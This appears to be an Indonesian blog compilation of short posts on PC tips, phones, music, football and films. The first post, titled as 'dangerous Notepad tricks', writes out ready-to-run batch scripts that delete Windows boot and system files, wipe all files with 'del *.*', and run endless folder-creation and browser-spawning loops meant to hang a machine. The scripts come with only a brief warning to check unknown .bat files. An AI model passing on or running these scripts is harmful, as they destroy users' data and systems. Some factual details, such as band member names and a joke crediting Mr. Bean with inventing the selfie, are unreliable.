4 Trik Notepad yang Berbahaya

Tahukah anda sebuah aplikasi dapat dibuat melalui notepad yang ada di windows. Dengan menggunakan perintah pemrograman yang simple, kita bisa mengendalikan komputer dengan sekali klik. Namun jika seseorang iseng membuat komputer kita misalnya mati ketika klik file yang dibuat, maka file yang awalnya notepad tersebut dan tersimpan dengan ekstensi .bat bisa membuat kita frustasi.

Seperti halnya virus yang menyebar pada komputer, awalnya adalah perintah pemrograman simple yang disusun menjadi lebih banyak dan kompleks. Jika kita menemukan file seperti itu, sebaiknya periksa dulu file tersebut, jangan langsung klik double (open) namun buka terlebih dahulu notepad, kemudian tarik file tersebut kedalam notepad.

Berikut adalah 4 trik notepad yang berbahaya :

1. Mematikan (shut down) komputer selamanya

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

 

2. Folder akan memperbanyak dengan sendirinya dan akan memenuhi ram dan akhirnya komputer akan hang

@echo off
:top
md %random%
goto top

3. Menghapus semua file pada komputer

del *.*

4. Membuat ram menjadi crash

:A
start http://google.com/
goto A

 

 

 

Mengatasi PC yang Panas

Komputer PC yang mengalami panas berlebih akan mengakibatkan penurunan performa pada kinerjanya. Terkadang ketika bermain game berat atau menggunakan aplikasi dalam waktu yang lama menyebabkan heatsing. Kipas bawaan yang dipasang pada processor ketika tak mampu menahan panasnya komponen cpu. Panas, panas, dan panas.

Lalu apa saja yang bisa dilakukan untuk mengatasi PC yang panas?

1. Matikan komputer setidaknya 1 jam saja.

2. Jika cara no.1 tak mungkin dilakukan, maka turunkan performa (tune up utilities) dan hentikan beberapa aplikasi yang sedang tidak dipakai.

3. Pindah komputer pada ruangan ber ac

4. Lepas chasing

5. Jika masih saja panas, lakukan seperti contoh dibawah ini. wus-wus-wus….

panas

Penemu Foto Selfie Pertama Di Dunia adalah…

Foto selfie atau kegiatan menfoto dirinya sendiri saat ini sudah sangat sering dilakukan mulai dari anak-anak sampai kakek-nenek. Sejarah terciptanya masih simpang siur, siapakah penemunya? kapan pertama kali dilakukan? dan dimana foto tersebut diambil?

Setelah googling kesana-kemari, akhirnya penemuan pun terungkap. Ternyata dia sudah tidak asing lagi ketika melihat wajahnya yang sangar, sangat maskulin, terlihat seperti cleverboy. Siapakah dia penemu foto selfie pertama di dunia? ini dia MR. Bean!!!

selfie

Cara Foto KTP Background Berwarna Biru

Foto KTP saat ini diharuskan untuk memakai background berwarna. Warna biru untuk kelahiran di tahun genap dan warna merah untuk yang lahir di tahun ganjil (kalau nggak salah).

Untuk membuat foto tersebut biasanya orang-orang akan mendatangi tempat foto studio. Namun untuk orang yang malas pergi ke luar rumah, kita bisa mencari bantuan ke teman untuk menfoto kita.

Untuk urusan jepret menjepret, kamera apa saja bisa digunakan.  Mau DSLR, Pocket, Kamera Handphone, atau kamera-kameraan ya boleh. Yang penting backgroundnya berwarna.

Cara pertama terserah mau foto dimana saja, dengan bantuan photoshop bisa kita memberi warna menjadi biru atau merah pada background yang tadinya berwarna putih karena berfoto di samping tembok. Jika tidak ada photoshop, cara yang kedua adalah seperti gambar dibawah ini

foto ktp

Selamat Mencoba 😛

Avenged Sevenfold Konser Lagi di Indonesia

Avenged Sevenfold Konser di Indonesia? yup band metal asal Amerika Serikat yang sangat popular di Indonesia telah merencanakan kedatangannya di Indonesia. Meskipun awal berdirinya band ini beraliran Metal, namun semakin kesini band ini mempunyai banyak genre. Mulai dari Metal Core, Cross Metal, Country, dan beberapa lagu yang diciptakan mereka bisa dibilang easy listening seperti pada lagu Dear God, Seize The Day, dan So Far Away. Jadi tidak hanya penggemar musik metal saja yang menggemari band ini, akan tetapi lebih banyak penikmat musik lainnya.

Awal tahun 2015 tepatnya pada tanggal 18 Januari 2015, A7x singkatan dari Avenged Sevenfold telah resmi mengumumkan akan datang di Jakarta, Indonesia dalam tour Asia.

avenged sevenfold Konser di Jakarta

Kedatangan Matt Shadows dkk bukan pertama kalinya di Indonesia, tahun 2007 dan 2008 mereka sukses menghibur penggemarnya di Indonesia. Dan pada tanggal 1 Mei 2012 mereka juga mengadakan konser ketiga kalinya di Indonesia, namun sayangnya pihak promotor yang kurang memenuhi standard panggung yang diminta kru A7X membuat mereka membatalkan konsernya.

Avenged Sevenfold sampai saat ini sudah mengeluarkan 6 Album resmi, antara lain Sounding of the Seventh Trumphet, Waking The Fallen, City Of Evil, Avenged Sevenfold (self titled), Nightmare, dan Hail To The King. Personel yang tak asing lagi bagi para penggemarnya mulai dari Vokalis Matt Shadow, Guitar : Synyster Gates, Zacky Vengeance, dan Bassist Johny Cage. Sementara sejak meninggalnya drummer mereka Jimmy Sullivan mereka merekrut drummer dari band senior Dream Theater Mike Portnoy. Namun sekarang mereka menggantinya lagi dengan Arin Illejai.

FTV Selalu Happy Ending, ini alasannya

FTV sudah dimana-mana, mulai dari stasiun televisi nasional seperti Indonsiar, RCTI, Global TV, dan yang paling banyak ftvnya ada di SCTV. Entah apa yang membuat para penonton mauuuu aja nonton acara tersebut. Ane ga abis pikir nih pilem kayak gitu bisa bikin yang nonton jengkel sendiri, atau senyam-senyum sendiri. Apalagi pas endingya, beuuh pasti happy ending (berakhir bahagia). Tau ga gan alasannya kenapa?

ftv happy ending

Iya jelas lah!!! soalnya durasi waktu cuman 2 jam. Coba kalo durasinya di panjangin lagi jadi 2 tahun!!!

Dalam waktu dua tahun tuh cowo ganteng sama cewe cantik juga bakalan pusing mikirin tagihan listrik, mau masak nasi berasnya masih ada ga???? Apalagi pas anak nya udah lahir, udah sanggup nggak nyebokin? Atau mertua minta jatah buat beli ini itu dan tetek mbengek. Inget gan semuanya akan mumet pada waktunya.

ftv 2 tahun

 

 

Kacaunya Sepakbola Indonesia

Apakah bangsa ini masih terus berharap tim nasional Indonesia akan masuk piala dunia? Harapan itu sangat berat jika menilik perkembangan sepakbola yang ada di Indonesia. Banyaknya kekacauan sampai eksploitasi ( contohnya timnas u19 kemarin ) semakin memperburuk keaadaan persepak bolaan indonesia.

Kasus 8 besar liga Indonesia kemarin yang melibatkan 4 tim antara lain PSIS Semarang, Persis Solo, PSS Sleman, dan Pusamania Borneo FC. Sepak bola gajah, ya sebutan itu pernah diperdengarkan beberapa tahun lalu yang dilakukan pemain sepak bola indonesia. Hal ini terulang kembali ketika PSS Sleman berhadapan dengan PSIS Semarang. Pertandingan yang sangat memalukan itu berakhir dengan skor 3-2 dengan semua gol dicetak oleh pemain klub masing-masing (bunuh diri), sangat memalukan bukan.

Alasan mereka melakukan gol bunuh diri agar tidak menjuarai puncak klasemen grup demi menghindari klub Borneo FC. Ketakutan PSS dan PSIS sangat beralasan karena Borneo FC bisa dikatan “menakutkan” bagi tim lawan. Terbukti setelah Pesis Solo melakukan “walk over” sebelum pertandingan dimulai. Official Persis Solo mengatakan bahwa mundurnya mereka bukan menyerah tanpa sebab. Mereka merasa tertekan oleh situasi non teknis. Sebenarnya Persis Solo masih memiliki kesempatan lolos karena hanya berselisih 2 poin jika bisa mengalahkan Borneo FC, namun kondisinya sangat tidak memungkinkan bagi tim asal Jawa Tengah tersebut akibat tertekan. Salah satu contoh hal yang aneh dari pertandingan yang dijalani Borneo FC adalah dalam 10 kali pertandingan kandangnya, meraka mendapatkan 8 kali pinalti.

mikir

Siapakah yang salah dengan kejadian ini? apakah pihak keamanan yang tidak bisa menjamin berlangsungnya kompetisi ataukah kesadaran masyarakat yang masih sangat minim. Bandingkan dengan negara yang telah mendukung penuh kompetisi sepak bola antar klub di liga ternama di dunia, sebagai tuan rumah mereka menyemangati tim mereka namun tidak mengintimidasi tim tamu. Jika kejadian ini masih saja terjadi, sampai kapan kita akan bermimpi untuk melihat Timnas Indonesia bisa masuk piala dunia.

Handphone Android Kamera Bagus 2 Jutaan

Handphone Android saat ini mengalami kemajuan yang sangat pesat, dengan teknologi processor, ram, display layar, dan salah satu bagian yang sarat sebagai pertimbangan adalah kamera yang berkualitas. Jika punya banyak duit, ga usah baca ini artikel dan langsung saja tanpa pikir panjang untuk segera mendapatkan iphone 6, sony xperia z3 atau HTC one 8m. Kalo masih pengen tahu apa saja smartphone android yang dijual murah sekitar 1 jutaan atau 2 jutaan paling mahal 3 jutaan saja, namun dengan dengan catatan hasil fotonya bagus.

Banyak orang yang menganggap semakin besar ukuran megapiksel ( contoh : 2 mp, 3,15 mp, 5 mp, 8 mp, atau 13 mp ) maka otomatis hasilnya akan lebih bagus. Namun kenyataannya ukuran pixel bukanlah faktor utama kualitas foto. Dalam urusan jepret menjepret masih banyak aspek yang dimiliki oleh sebuah kamera. Selain ukuran pixel, aperture juga berpengaruh pada kecepatan tangkapan gambar. Sekarang para produsen smartphone sudah mulai terbuka dengan spek mereka yang ditawarkan, misalnya saja asus zenfone ditulis 8 MP dan f/2.0 Aperture. Secara teknik f/2.0 lebih baik daripada f/2.2 atau f/2.4.

kamera smarphone sample

Selain kecepatan prosessor, adanya fitur seperti image stabilizer juga berguna untuk menghindari blur pada objek. Dan pada beberapa smartphone telah memasangkan sensor seperti exmor dan pixelmaster. Let’s check it out smartphone android apa saja yang mempunyai kamera bagus di kisaran harga 2 jutaan ( semua sudah aufocus dan dengan lampu led flash ):

10. Motorola Moto G. 5 MP harga 2.000.000

9. Xperia L dual. 8 MP, with exmor RS, f/2.0  harga 2.500.000

8. Asus Zenfone 5. 8MP, with pixelmaster f/2.0  harga 2.150.000

7. Samsung Galaxy Grand Neo, 5 MP, harga 2.500.000

6. Asus Zenfone 6 13 MP, with pixelmaster f/2.0 harga 2.800.000

5. HTC Desire 616, 8 MP harga 2.999.999

4. Lenovo Vibe X, 13 MP harga 2.800.000

3. Xiaomi Redmi Note, 13 MP, f/2.2 harga 2.500.000

2. Soni Xperia C, 8 MP, f/2.0 harga 2.800.000

1. Acer Liquid e3, 13 MP, f/1.8, harga 2.500.000

 

Sisi Positif Banjirnya Handphone Cina yang dicap Murahan

Banyak yang mengatakan bahwa handphone atau smartphone buatan cina itu murahan? benarkah begitu? Kalau murah sih pasti dibanding brand yang sudah terkenal seperti Samsung ( asal korea selatan ), Sony ( asal Jepang ), HTC ( asal Taiwan ), Nokia ( Finlandia ) dan masih banyak lainya.

Sampai saat ini peminat hp cina semakin tinggi meskipun kualitas produk yang ditawarkan masih dipertanyakan. Vendor yang sangat mengejutkan Xiaomi misalnya, dengan menawarkan fitur canggih dan harga yang sangat murah dibandingkan dengan smartphone berspesifikasi yang setara. Untuk harga Smartphone Android Xiaomi Redmi 1s yang berprocessor quadcore 1,6 ghz, ram 1 GB dan kamera 8 MP hanya dijual dengan harga 1.499.000 saja. Berbeda jika kita akan membeli semisal Samsung Galaxy S3 yang mempunyai spesifikasi hampir sama seperti ponsel tadi akan tetapi harga 3.999.000. Sedangkan HTC Desire 616 yang spek nya lebih rendah dari dari kedua ponsel tersebut harga berkisar 3 jutaan.

Capture

Opini masyarakat pun berbeda beda, ada yang bersikukuh mending membeli ponsel branded meskipun mahal dari pada menyesal. Sedangkan dipihak lain bependapat kalau dengan harga murah bisa dapet gadget canggih, why not?

Sebenarnya kedua opini tersebut tak ada yang musti disalahkan. Mungkin ada beberapa faktor seperti daya beli dan status sosialnya. Namun dari fenomena yang ada saat ini sebenarnya sangat menguntungkan konsumen. Dengan banjirnya handphone cina yang menghancurkan harga pasaran smartphone dengan merk terkemuka secara otomatis akan membuat mereka saling berkompetisi secara ketat. Dan tentunya ponsel branded secara terpaksa akan menurunkan harga demi meningkatkan penjualannya.

Kemudian, apakah benar smartphone android cina memang barang murahan yang sebenarnya riskan untuk kita miliki? Kita belum punya bukti tentang kualitas, yang kita tahu dari pihak vendor sendiri mereka menjanjikan fitur dan performa yang luar biasa namun ketahanan dibandingkan smartphone branded belum berani mereka janjikan.

Tidak hanya gadget saja, teknologi lainnya juga ada perbedaan yang signifikan. Contohnya saja saat bermain Play Station, ketika kita mencoba membeli 2 stik yang 1 original ( merk sony ) sedangkan satunya ( buatan cina/lokal ). Maka kita akan melihat dan merasakan sendiri bagaimana kepuasan yang didapat. Namu jika memang terkendala masalah dana, ya apa boleh buat.

Jadi kita tidak boleh menyalahkan perbedaan pandangan ini, karena telah jelas terlihat tadi sisi positif adanya ponsel murah. Namun sayangnya meskipun harga smartphone yang semakin murah akan tetapi Indonesia adalah penjual smartphone dengan harga lebih tinggi diantara negara seperti Thailand, Malaysia, Singapore, Philipina dan India.

Film Tentang “Bullying”

Berikut film yang menceritakan tentang bully :

bullying

  1. The Education of Charlie Bank (2012). Seorang mahasiswa yang mempunyai masalah ketika seorang teman SMA yang sering membully nya juga berada di kampusnya.
  2. BEN X (2010). Karena sering di bully di sekolahnya, seorang remaja autis mengalihkan dunianya di game online sebagai ‘role-player’.
  3. 17 Again ( 2009 ). Hidupnya yang tidak sesuai dengan impiannya, seorang pria dewasa menginginkan dia bisa kembali lagi di usia 17 tahun untuk mengubah takdirnya.
  4. The New Guy ( 2002 ). Cowok kurus, tak punya daya, selalu dilecehkan dihadapan orang banyak kemudian ia mengubah image dan berpikir bagaimana untuk membalas semua perbuatan yang tidak menyenangkan, it’s about from zero to hero. Film ini sangat lucu dan inspiratif sekali bagi mereka yang lemah.
  5. Boys Don’t Cry (1999). Terlahir sebagai wanita, identitas nya berubah ketika dewasa dan bagaimana ia bisa menemukan jatidirinya
  6. Speak (2004). Setelah mendapatkan trauma, Melinda memilih untuk diam di sekolahnya. Pengalaman buruk yang menimpanya mebuatnya memberontak
  7. Let The Right on it (2008). Oskar, seorang anak yang diabaikan dan dibulli,  menemukan cinta dan balas dendam melalui eli, seorang gadis cantik tapi aneh.
  8. Cyber Bully (2011). Seoarang gadis yang menjadi objek bullying di media sosial.

Bullying sedang gentar terjadi akhir-akhir ini di berbagai media. Bullying adalah perbuatan memojokkan, menyudutkan, menganiaya, atau memperlakukan seseorang semena-mena.

Korban bully bisa sangat menderita baik fisik maupun psikologis. Sekedar untuk mengetahui kisah-kisah inspiratif yang bisa ditonton lewat film, berikut 10 movie list yang menceritakan tentang bullying.